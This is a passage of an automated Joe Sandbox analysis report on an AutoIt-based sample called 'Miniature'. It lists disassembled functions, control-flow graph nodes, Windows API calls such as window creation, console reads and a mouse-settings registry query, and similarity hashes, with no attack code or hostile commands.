                                                                                                                                                                                                                                                                                            control_flow_graph 633 c490c5-c490d5 634 c490d7-c490ea call c3f636 call c3f649 633->634 635 c490ef-c490f1 633->635 652 c49471 634->652 637 c490f7-c490fd 635->637 638 c49459-c49466 call c3f636 call c3f649 635->638 637->638 641 c49103-c4912e 637->641 657 c4946c call c42b5c 638->657 641->638 644 c49134-c4913d 641->644 647 c49157-c49159 644->647 648 c4913f-c49152 call c3f636 call c3f649 644->648 650 c49455-c49457 647->650 651 c4915f-c49163 647->651 648->657 654 c49474-c49479 650->654 651->650 656 c49169-c4916d 651->656 652->654 656->648 659 c4916f-c49186 656->659 657->652 662 c491a3-c491ac 659->662 663 c49188-c4918b 659->663 666 c491ae-c491c5 call c3f636 call c3f649 call c42b5c 662->666 667 c491ca-c491d4 662->667 664 c49195-c4919e 663->664 665 c4918d-c49193 663->665 670 c4923f-c49259 664->670 665->664 665->666 697 c4938c 666->697 668 c491d6-c491d8 667->668 669 c491db-c491dc call c43b93 667->669 668->669 677 c491e1-c491f9 call c42d38 * 2 669->677 672 c4932d-c49336 call c4fc1b 670->672 673 c4925f-c4926f 670->673 684 c49338-c4934a 672->684 685 c493a9 672->685 673->672 676 c49275-c49277 673->676 676->672 682 c4927d-c492a3 676->682 706 c49216-c4923c call c497a4 677->706 707 c491fb-c49211 call c3f649 call c3f636 677->707 682->672 687 c492a9-c492bc 682->687 684->685 689 c4934c-c4935b GetConsoleMode 684->689 693 c493ad-c493c5 ReadFile 685->693 687->672 691 c492be-c492c0 687->691 689->685 696 c4935d-c49361 689->696 691->672 698 c492c2-c492ed 691->698 694 c493c7-c493cd 693->694 695 c49421-c4942c GetLastError 693->695 694->695 702 c493cf 694->702 700 c49445-c49448 695->700 701 c4942e-c49440 call c3f649 call c3f636 695->701 696->693 703 c49363-c4937d ReadConsoleW 696->703 704 c4938f-c49399 call c42d38 697->704 698->672 705 c492ef-c49302 698->705 713 c49385-c4938b call c3f613 700->713 714 c4944e-c49450 700->714 701->697 709 c493d2-c493e4 702->709 711 c4939e-c493a7 703->711 712 c4937f GetLastError 703->712 704->654 705->672 716 c49304-c49306 705->716 706->670 707->697 709->704 719 c493e6-c493ea 709->719 711->709 712->713 713->697 714->704 716->672 723 c49308-c49328 716->723 726 c49403-c4940e 719->726 727 c493ec-c493fc call c48de1 719->727 723->672 733 c49410 call c48f31 726->733 734 c4941a-c4941f call c48c21 726->734 738 c493ff-c49401 727->738 739 c49415-c49418 733->739 734->739 738->704 739->738
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 8f5c602dcba2b9d460464f8b98d3e46a742e3cd32c01ffcaebd37b91c8f80f79
                                                                                                                                                                                                                                                                                            • Instruction ID: 896c9544587eff741a461dd775583637bbd5677f2b3beeed3fdc9c3f6160147d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f5c602dcba2b9d460464f8b98d3e46a742e3cd32c01ffcaebd37b91c8f80f79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C1D270D042599FDF11DFE9D845BAEBBB0FF0A310F184159F965AB2A2C7309A42CB61
                                                                                                                                                                                                                                                                                            Function 00C2AC3E Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 741 c2ac3e-c2b063 call c18ec0 call c2bc58 call c1e6a0 748 c68584-c68591 741->748 749 c2b069-c2b073 741->749 752 c68596-c685a5 748->752 753 c68593 748->753 750 c2b079-c2b07e 749->750 751 c6896b-c68979 749->751 754 c685b2-c685b4 750->754 755 c2b084-c2b090 call c2b5b6 750->755 758 c6897e 751->758 759 c6897b 751->759 756 c685a7 752->756 757 c685aa 752->757 753->752 762 c685bd 754->762 755->762 766 c2b096-c2b0a3 call c1c98d 755->766 756->757 757->754 760 c68985-c6898e 758->760 759->758 763 c68993 760->763 764 c68990 760->764 767 c685c7 762->767 768 c6899c-c689eb call c1e6a0 call c2bbbe * 2 763->768 764->763 774 c2b0ab-c2b0b4 766->774 772 c685cf-c685d2 767->772 806 c2b1e0-c2b1f5 768->806 807 c689f1-c68a03 call c2b5b6 768->807 775 c2b158-c2b16f 772->775 776 c685d8-c68600 call c34cd3 call c17ad5 772->776 778 c2b0b8-c2b0d6 call c34d98 774->778 781 c68954-c68957 775->781 782 c2b175 775->782 817 c68602-c68606 776->817 818 c6862d-c68651 call c17b1a call c1bd98 776->818 791 c2b0e5 778->791 792 c2b0d8-c2b0e1 778->792 786 c68a41-c68a79 call c1e6a0 call c2bbbe 781->786 787 c6895d-c68960 781->787 788 c688ff-c68920 call c1e6a0 782->788 789 c2b17b-c2b17e 782->789 786->806 848 c68a7f-c68a91 call c2b5b6 786->848 787->768 797 c68962-c68965 787->797 788->806 810 c68926-c68938 call c2b5b6 788->810 798 c2b184-c2b187 789->798 799 c68729-c68743 call c2bbbe 789->799 791->767 802 c2b0eb-c2b0fc 791->802 792->778 800 c2b0e3 792->800 797->751 797->806 808 c686ca-c686e0 call c16c03 798->808 809 c2b18d-c2b190 798->809 828 c6888f-c688b5 call c1e6a0 799->828 829 c68749-c6874c 799->829 800->802 802->751 811 c2b102-c2b11c 802->811 812 c2b1fb-c2b20b call c1e6a0 806->812 813 c68ac9-c68acf 806->813 839 c68a05-c68a0d 807->839 840 c68a2f-c68a3c call c1c98d 807->840 808->806 837 c686e6-c686fc call c2b5b6 808->837 820 c68656-c68659 809->820 821 c2b196-c2b1b8 call c1e6a0 809->821 859 c68945 810->859 860 c6893a-c68943 call c1c98d 810->860 811->772 825 c2b122-c2b154 call c2bbbe call c1e6a0 811->825 813->774 831 c68ad5 813->831 817->818 833 c68608-c6862b call c1ad40 817->833 818->820 820->751 826 c6865f-c68674 call c16c03 820->826 821->806 856 c2b1ba-c2b1cc call c2b5b6 821->856 825->775 826->806 878 c6867a-c68690 call c2b5b6 826->878 828->806 865 c688bb-c688cd call c2b5b6 828->865 846 c6874e-c68751 829->846 847 c687bf-c687de call c1e6a0 829->847 831->751 833->817 833->818 886 c686fe-c6870b call c18ec0 837->886 887 c6870d-c68716 call c18ec0 837->887 854 c68a1e-c68a29 call c1b4b1 839->854 855 c68a0f-c68a13 839->855 893 c68ac2-c68ac4 840->893 862 c68757-c68774 call c1e6a0 846->862 863 c68ada-c68ae8 846->863 847->806 885 c687e4-c687f6 call c2b5b6 847->885 881 c68ab5-c68abe call c1c98d 848->881 882 c68a93-c68a9b 848->882 854->840 904 c68b0b-c68b19 854->904 855->854 871 c68a15-c68a19 855->871 905 c2b1d2-c2b1de 856->905 906 c686ba-c686c3 call c1c98d 856->906 877 c68949-c6894f 859->877 860->877 862->806 908 c6877a-c6878c call c2b5b6 862->908 869 c68aed-c68afd 863->869 870 c68aea 863->870 911 c688de 865->911 912 c688cf-c688dc call c1c98d 865->912 888 c68b02-c68b06 869->888 889 c68aff 869->889 870->869 890 c68aa1-c68aa3 871->890 877->806 920 c68692-c6869b call c1c98d 878->920 921 c6869d-c686ab call c18ec0 878->921 881->893 897 c68a9d 882->897 898 c68aa8-c68ab3 call c1b4b1 882->898 885->806 928 c687fc-c68805 call c2b5b6 885->928 929 c68719-c68724 call c18577 886->929 887->929 888->812 889->888 890->806 893->806 897->890 898->881 898->904 917 c68b1e-c68b21 904->917 918 c68b1b 904->918 905->806 906->808 931 c6878e-c6879d call c1c98d 908->931 932 c6879f 908->932 927 c688e2-c688e9 911->927 912->927 917->760 918->917 940 c686ae-c686b5 920->940 921->940 935 c688f5 call c13907 927->935 936 c688eb-c688f0 call c1396b 927->936 951 c68807-c68816 call c1c98d 928->951 952 c68818 928->952 929->806 942 c687a3-c687ae call c39334 931->942 932->942 950 c688fa 935->950 936->806 940->806 942->751 956 c687b4-c687ba 942->956 950->806 955 c6881c-c6883f 951->955 952->955 958 c68841-c68848 955->958 959 c6884d-c68850 955->959 956->806 958->959 960 c68852-c6885b 959->960 961 c68860-c68863 959->961 960->961 962 c68865-c6886e 961->962 963 c68873-c68876 961->963 962->963 963->806 964 c6887c-c6888a 963->964 964->806
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
                                                                                                                                                                                                                                                                                            • API String ID: 0-4285391669
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ba8a5bc66df3f1e8c927b630dfe3f22196ca0042c33543e831e854eb5a5709d
                                                                                                                                                                                                                                                                                            • Instruction ID: 2571a402a9c97f61337e509eddf3123f7207754e13b8798c857a2cb61585bb9c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba8a5bc66df3f1e8c927b630dfe3f22196ca0042c33543e831e854eb5a5709d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4625CB0508341CFC724DF15D095A9ABBE1FF89308F10895EE89A8B352DB71DA49DF92
                                                                                                                                                                                                                                                                                            Function 00C135B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1001 c135b3-c13623 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C135E1
                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13602
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C13616
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00C13368,?), ref: 00C1361F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$CreateShow
                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3$edit
                                                                                                                                                                                                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                                                                                            • Opcode ID: 44bf4de530af9817ef90b281f14f2f190a2f6a31e16835f79d1e752d5eb48ef2
                                                                                                                                                                                                                                                                                            • Instruction ID: c393a22f93ff650f91007060fd6795e74ef29d1ab588038298a00b9758b9dbb2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44bf4de530af9817ef90b281f14f2f190a2f6a31e16835f79d1e752d5eb48ef2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAF03A706402D57AEB3507136C88F3B2EBDD7C7F14B00001EB906AB5B0D6694841EEB0
                                                                                                                                                                                                                                                                                            Function 00C161A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C55287
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C16299
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                                                                                                                                                                            • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                            • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                            • Opcode ID: c35746e0897f8de696aea5d43ed6731afee24920f90da86250dc8f66a622db8a
                                                                                                                                                                                                                                                                                            • Instruction ID: dd92ef75edc2236099e51542241a335c73bce7e74e6af3078af3b9eaa0cf4cae
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c35746e0897f8de696aea5d43ed6731afee24920f90da86250dc8f66a622db8a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9419571408304AAC711EB60DC45FDF77ECAF86320F10462EF599921A1EB749A89EB96
                                                                                                                                                                                                                                                                                            Function 00C158CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 1053 c158cb-c158d6 1054 c15948-c1594a 1053->1054 1055 c158d8-c158dd 1053->1055 1056 c1593b-c1593e 1054->1056 1055->1054 1057 c158df-c158f7 RegOpenKeyExW 1055->1057 1057->1054 1058 c158f9-c15918 RegQueryValueExW 1057->1058 1059 c1591a-c15925 1058->1059 1060 c1592f-c1593a RegCloseKey 1058->1060 1061 c15927-c15929 1059->1061 1062 c1593f-c15946 1059->1062 1060->1056 1063 c1592d 1061->1063 1062->1063 1063->1060
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C158EF
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C15910
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00C158BE,SwapMouseButtons,00000004,?), ref: 00C15932
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                            • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                            • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                            • Opcode ID: 7ba696f9cb5e8b18dab1897ddca3b26278e7a165db05f364ec4bc1156f23d24a
                                                                                                                                                                                                                                                                                            • Instruction ID: 9d51ada8cf87188f251b646d843ef306d255fbe108411065dd98b78da63dec6c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ba696f9cb5e8b18dab1897ddca3b26278e7a165db05f364ec4bc1156f23d24a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C115A75510618FFDB218F64CC80AEEB7B8EF42764F108419F802E7210E2319E82E761
                                                                                                                                                                                                                                                                                            Function 00C1F6D0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • Variable must be of type 'Object'., xrefs: 00C648C6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                            • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                            • Opcode ID: c70269c9dcd5bc484a25fbb9df086f42c560d6b4ad599967cd16cb6b9bd990b6
                                                                                                                                                                                                                                                                                            • Instruction ID: faa411246b8b290207c95d4c0a6867952e796543b6516c164a784479fc5afce6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c70269c9dcd5bc484a25fbb9df086f42c560d6b4ad599967cd16cb6b9bd990b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CC28E71E00215DFCB24DF58D890BADB7F1BF0A710F248169E915AB391D375AE82EB90
                                                                                                                                                                                                                                                                                            Function 00C20340 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C215F2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c3674dc201886e10ceb5bacaeac2a7dd8607c963d19439ddad053c623839b6b6
                                                                                                                                                                                                                                                                                            • Instruction ID: 5e4d14295a669e7c9c8891967541879c09e21a70da5912c44b9f49a9298a01d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3674dc201886e10ceb5bacaeac2a7dd8607c963d19439ddad053c623839b6b6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3EB27C74A08360CFCB24CF19E490A2AB7E1BF99300F24495EF9958B752D771EE41DB92
                                                                                                                                                                                                                                                                                            Function 00C3014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C309D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C33614: RaiseException.KERNEL32(?,?,?,00C309FA,?,00000000,?,?,?,?,?,?,00C309FA,00000000,00CD9758,00000000), ref: 00C33674
                                                                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00C309F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                            • String ID: Unknown exception
                                                                                                                                                                                                                                                                                            • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                            • Opcode ID: 437e225d1a142960e678e00195174bdb68f9c4f3993adf7b640bea375ea28c11
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c61d1e7e46044fce33a410b7e0a484b713d2c4795674e3f5ba69e4a9a05400a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 437e225d1a142960e678e00195174bdb68f9c4f3993adf7b640bea375ea28c11
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF0C23692030CBB8B00BAA9EC66A9E777C5E00350F704121BA24965D2FB71EB55D6D0
                                                                                                                                                                                                                                                                                            Function 00C989B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C98D52
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C98D59
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C98F3A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 80fbfe40d0e9dda8bd9e0e1995722f08a34b0ef204bc36fde30305c36b72ba40
                                                                                                                                                                                                                                                                                            • Instruction ID: 7033119e239eb23609950ca568f4b38649cc93bf441e3726a1204ee5ea85711f
